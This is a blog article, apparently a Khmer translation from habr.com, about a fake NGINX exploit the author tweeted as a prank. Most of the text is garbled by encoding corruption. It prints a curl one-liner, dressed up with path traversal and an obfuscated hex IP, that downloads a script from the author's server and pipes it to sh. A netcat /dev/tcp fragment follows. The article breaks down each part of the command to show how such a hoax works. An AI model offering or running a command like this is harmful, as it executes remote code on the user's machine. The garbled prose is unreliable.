α
αααΆαα αααααα:
TL;DRα αα»αααααΎααααααααα αΌαα―αααΆαααΆ sh α¬ bash αααα»αααΆααααααααΆαααααα αααααΊααΆαα·ααΈααααα’αα½αααΎααααΈααΆαααααααΆαααααααααααα»αααααΌαααααααα’αααα
αααα»αα
ααα
αααααααααΆαα½αα’αααααΌαααΏαααααΈαα½αα’αααΈααΆαααααααααααα
PoC αααααααααααααααααΌαααΆααααααΎαα‘αΎααα
ααααααΈ 31 ααα§αααΆα ααΆααααΆααααα αΆααααα½αααααΆαα ααΎααααΈααααΎαααααΉαααααααΆαααΈ
αααααΆααααα ααααΆαααααΎααΆαααΎαα αα ααααα obfuscation ααααΈαα αααα»α curl αααα»αααΆαααααααα Tweet ααΎα α αΎα "ααα ααααΆα PoC ααααααα»αααααΎαααΆα" αααααΆααααααΆαααααα½αααααΌααααααααααααΆααΆαααααΆαααΆαααααααααααααΆαααααΎαα ααΆααΆααα·αααΆαα αααααΊααΆααΆααα·αααα ααα»ααααααααααα αααα»αααααααααΆαααα»αααΉαααααΌαααΆααααααΆαααααΆαα α αΎαααα’αααα»α αααα»αααΉαααα½αααΆαααΆαα‘αΎααα·αααΈαααΈαα (α’αΌα)α
αααβααΆβαααΆαβααΆ αααα»αβαα·αβα’αΆα βαααααβααΎαβααΆβααΆαβα’αααΈβααΎαβα‘αΎαβαααααΆααβαααα αααααΆαααα·αααΆααααα tweet αααααααα»αααΆαααΎαα‘αΎααααΆαααααΆααα αα½αα±ααααααΆααααα’αΎααα αααααα (15:00 αααααα ααΈαααα»αααΌααααΌααααααΈ 1 αααα·αα»ααΆ) ααΆαααα»ααααα·α ααΆαααααααΆαααΉαααΆαααααΊααΆαααααααααΆαα ααα»αααααΆα αααΎαααΆααααα ααααΆα‘αΎααα·αααααα·ααα·αα·αααααΎαααΆααΆααααααα (α’αα»ααααΆαα±ααααΆαααΆααααααααΎαα ααααααααΆα ααα·α ASCII αααα½αα±αααααα‘αΆαααααααΆα αα) α
ααΎαβαα
βααα’αΆαβααα»ααααΆ!
αααααααααααααα·ααα»α αα·ααααααΆααα’αααααααΊα’ααα αΆααα ααΆα αααΆααααΆααααΆααα»αααααααΌαααααααΎαααΆαααΌααα ααΎαααΆαααΈααααααα½αααααΎααααΈααΎααα½αααα ααΆααααΆαααα’ αααααα·ααΈαα»αααααΆαα’ααΈαααΊαα·αααααΎαααΆαααΌα ααααΆ α αΎααα½αααΆαα½αααΉαααΆααα·ααααααΆαααα»ααα·αααΆαα·αα ααααΆααααα αΆααααΌαα αααΆαα αααααΌααααααααα αααα»αααα ααααααααααααα»αααΊααααΆααααααααΎααΆαα α ααΆαα’αααΌααααα·αααααΆααΆαααα‘αΎα α¬ααααα·ααααα·ααΌαααααααααΆαα½αα‘αΎαα
ααΆαααααΆααααΌα
αα½αα
curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost
αα·αααααααα’αα‘α·α ααααΌαα·α ααααα (SEE) - α αααΎαααΆαααΆαααααα
αα»ααααα·ααΆα αα·αααΆααααααΉαααΊααΆαααααααααΆααααααΆααα·ααααααααα αααα»ααα·αααΆαα½αααααΆα’αααΈαααααΆαα±ααααΆααααα½αααΆαααααααα αααααΆααααΆααααααααΆαααααΆαααααΆαα αααΆααα’αααΈαα»ααααα·ααΆααααααααα "127.0.0.1" (αααΆαααΈαααΌαααααΆαααααΈ) α Localhost ααααΌαααΆαα αΆαααα»αααΆααΆααα»ααααα·ααΆα α αΎααα·αααααααα ααΎααΆαα·ααααα ααααΈαα»αααααΌαααααααα’αααααα
ααΆαααααΆααααααΆααααΊααΆαααΆαααΆαα» SEE ααααΆααααΈααΈαααααΆααα·αααααα αααααΆααααααα·αααααααα ααΆα ααααααΆαααα»ααααααααααΆααααΈααΌαααααΆαααααΉααααα»ααααα·ααΆααα»αααααΌααα ααΆααΆααΆαααααΆαααααα»αααΆααααααΎαααΌαααΎααααΈα±αααααααααααααααααΆα αΆααααΌα ααΆααααΆααααααΆαα αα·αααααΆααααααΆαα (α αΎαααΌα ααααααΆααα»ααααα·ααΆα)α ααΆαααα αΈααΆαα»ααααααααα·αααααααααααα α αΆαα α αΎααααα αΌαααΆααΆααααααα·αααααααΆ αααα αΆαααΆααα½αααΆαααααααααααΆααα
ααΆαβαααααβαααβααΊβααΆβααΆαβαα·ααΆαβαααα’α·αβααβαα½αβαααααΆααβα α’αααΈααααααααΆααα αααα»ααααααΈαααααΆαα ααααααΆαα·ααααΏαααα’αΆαα αΎαααΆααααααα ααααΆαα’αααΈααααΌαααΆαααΆαααΆααααααΆααααααα·ααααα·ααΆαααΆαααααααααααααΆαααααα
ααΎαααΆαααΆαα»α’αααΈαααααααα
αΆαααΆα
α? αααα -gsS
, -O 0x0238f06a
, |sh
αα·ααααΆαααΈααααααααΆααααα½αα―αα αααΆαααΈαααααα ααααααα·αααΆαααΆαααααΆαααααΆααΆααα ααα»ααααααααΆαααααααααΎααααΆα ααα·α ASCII αααααααΎααΆααααααααΆ echo
αα
αααα»αααααααΈααααααΆααα
αααα»α index.html
. αα
ααααααα’αααααααΎααααΆααααΆααααα
αΌααααααΆααααΆαα½α |sh
αα
βααΆαααααααΆα, index.html
αααα»ααα·αααααα·ααααα·α ααΆααααΆαααα’ α’ααααααααααΆαααΆαααΈαααααα ααααααα·αααΆαα
ααααΆα’αΆαααααααα
-
../../../%00
- ααααΆαα±ααα α½αααΈαα; -
ngx_stream_module.so
- ααααΌααα ααΆαααααΌαα»α NGINX α ααααα; -
/bin/sh%00<'protocol:TCP'
- ααΎαααααααααΆα αΆααααααΎα/bin/sh
αα ααΎαααΆαααΈαααααα αα·ααααααΌααααααα·ααααααα ααΆααα TCP; -
-O 0x0238f06a#PLToffset
- ααααΏααααααααααΆαα, αααααα#PLToffset
ααΎααααΈααΎααα ααΌα ααΆα’α»α αααα·αα’αααα αα αΆααααααΆααα αααα»α PLT α -
|sh;
- αααααααααΆαααα½ααααα ααΎαααααΌαααααΌααα·ααααααααα sh/bash ααΎααααΈααααα·ααααα·ααΌααααα ααααααΈαααΆαααΈαααααα αααααααΆααααα αΆααααααΆαααΈααΆαααα0x0238f06a
(2.56.240.x
); -
nc /dev/tcp/localhost
- α’ααα αααααααα netcat αααα ααΎ/dev/tcp/localhost
ααΎααααΈα±ααα’αααΈαααΎααα ααΆααα»ααααα·ααΆααααααααα ααΆαααΆααα·αααΆαα·αααααΎα’αααΈαααα αΎαααααΌαααΆααααα αΌααααα»ααααααΆαααααααΆααααΆααααααααα’αΆαα
ααααααα ααααΆααα·ααΌαααα’αααααα½ααααααΆαα αα·αααΆααα·ααΆααααΆα’αααΈαα·αααααΆααα "αα·αααααααα’αα‘α·α ααααΌαα·α ααααα" (ααΆαααααααααα»αααααααΆα)α
ααΆαααααααα ααΆαααααααααααΆαααΈαααααα ααααα αα·ααα·ααΆαααΆααααααΆαα
αααααΆαααααΆαα αααΎαααα’αα·αα·αααααααααα»αααΊααΆ infosec/hackers αααα»αααΆααααααα α α·αααααααΎα±αααααΆαααΈαααααα αααααααΆαααΆααααααΉαααΆααααα ααααα· "α αααΆααα’αΆαααααα" αα ααΎααααααααααα½ααα ααΎααααΈα’αααα»αααααΆαα’αααΈαααααααΌαααααΎ (α αΎαααΆααΉαααΈαααΆααααα»αααΆα αααα α) α αααα»αααΉααα·αααΆααααααΈαααα αΆααΆααα’αααα ααΈααααα α αΆααααΆααααΈααΆααα·ααααααααα»ααααα ααα»αααααααααΊααΆααΏααα½αα ααα½αααααααΆαααΈαααααααΎα
- ααΆαααΆααααΆααααααααΌαααΆαααα»ααααα ααα αΆααα ααΎαααααΆααααααααΆααααΆαα αα·ααααα½αααΌαααΆαααΌα ααΎαααΆαα»ααααααα ααΎααααΈααΎαααΉαα α·αααα’αααααααΎααααΆααα±ααα α»α ααΎαααα
- αααααΌααααα Chrome/Mozilla/Safari/etc αα ααΈααα’αΌααααααααααΆα Thugcrowd αααα½αα±ααααΆααααα αΆαααααααΈααααα
- ααααΆαααΎααααααΆα αααΆααααΆααααααΆαααααΆαααΆα/ααΆααα½α α αΌααααα₯αααΆααααα α αΎααααααΆααααα αΆααααααΎααααααΌαααααΎαα ααΆαααααΆαααΈααα NSA (ha!)α
- ααα‘αΎα Trojan ααααΌα ααΆ BIOS rootkit αα ααΎαα»αααααΌαααααΆααα’αααααα’αααααααΎααααΆααα αΌαααΎααααΆαααΈαααΈαααααα·ααΈαα»αααααααααΆ (ααααΆαααααα·ααΆαααααα!)
αααααααΌα
αα½ααα antimers
αααα»αααααΈααα ααααα αααα½αααααααααααα»αααΊααΎααααΈααααΎααΆααα αΆαααααααααααα·ααααα½αα ααα½ααααα Apache ααΆαα·ααα α αααΆααααα’αααααΆααααΆαααααΌααα·αααααΎ - α αΎααααα»αααΆααα·αααΆα α ααα»α’αααΈαα·αααααΎ?
NGINX Exploit (αα·α!)
ααΆβαβααΆβαααα
αΆαβαα
βααΆαα
ααααα: www.habr.com